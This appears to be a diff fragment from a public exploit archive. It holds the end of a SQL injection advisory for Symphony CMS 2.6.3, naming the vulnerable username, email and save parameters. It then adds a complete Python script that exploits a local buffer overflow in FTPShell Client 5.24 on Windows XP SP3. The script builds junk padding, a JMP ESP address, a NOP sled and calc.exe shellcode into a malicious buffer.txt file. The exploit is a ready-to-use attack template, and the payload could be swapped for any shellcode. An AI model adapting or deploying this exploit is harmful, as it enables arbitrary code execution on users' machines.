+back-end DBMS: MySQL 5.0
+================================================================
+Vulnerable Product:
+                                                               [+]
+ Symphony CMS 2.6.3
+
+Vulnerable Parameter(s):
+
+[+]fields[username] (POST)
+[+]fields[email] (POST)
+[+]action[save] (POST)
+
+Affected Area(s):
+                                [+]
+http://localhost/symphony2.6.3/symphony-2.6.3/symphony/system/authors/new/
+
+================================================================
+Disclosure Timeline:
+
+Vendor notification: Jan 29, 2016
+Public disclosure: Jan 30, 2016
+Credits & Authors
+================================================================
+Sachin Wagh (@tiger_tigerboy)
+
+
+-- Best Regards, *Sachin Wagh*

platforms/windows/local/39417.py

@@ -0,0 +1,44 @@
+#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
+#[+] Exploit Title: FTPShell Client (Add New Folder) Local Buffer Overflow
+#[+] Date: 2/2/2016
+#[+]Exploit Author: Arash Khazaei
+#[+] Vendor Homepage: www.ftpshell.com
+#[+]Software Link: http://www.ftpshell.com/download.htm
+#[+] Version: 5.24
+#[+] Tested on: Windows XP Professional SP3 (Version 2002)
+#[+] CVE : N/A
+#[+] introduction : Add New Folder In Remote FTP Server And In Name Input Copy Buffer.txt File content 
+#[+] or click on Remote Tab Then Click On Create Folder And Copy Buffer.txt In Name Input ...
+#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
+
+#!/usr/bin/python
+filename = "buffer.txt"
+# Junk A
+junk = "A"*452
+#77FAB277  JMP ESP
+# Windows Xp Professional Version 2002 Service Pack 3
+eip = "\x77\xB2\xFA\x77"
+# Nops
+nops = "\x90"*100
+# Shellcode Calc.exe 16Byte
+buf=("\x31\xC9"
+"\x51"    
+"\x68\x63\x61\x6C\x63"    
+"\x54"    
+"\xB8\xC7\x93\xC2\x77"    
+"\xFF\xD0")
+
+#Appending Buffers Together
+exploit = junk + eip + nops + buf
+#Creating File
+length = len(exploit)
+print "[+]File name:     [%s]\n" % filename
+print "[+]Payload Size: [%s]\n " % length 
+print "[+]File Created.\n" 
+file = open(filename,"w")
+file.write(exploit)
+file.close
+print exploit
+
+
+#[+] Very Special Tnx To My Best Friends: TheNonexistent,Nirex,Pr0t3ctor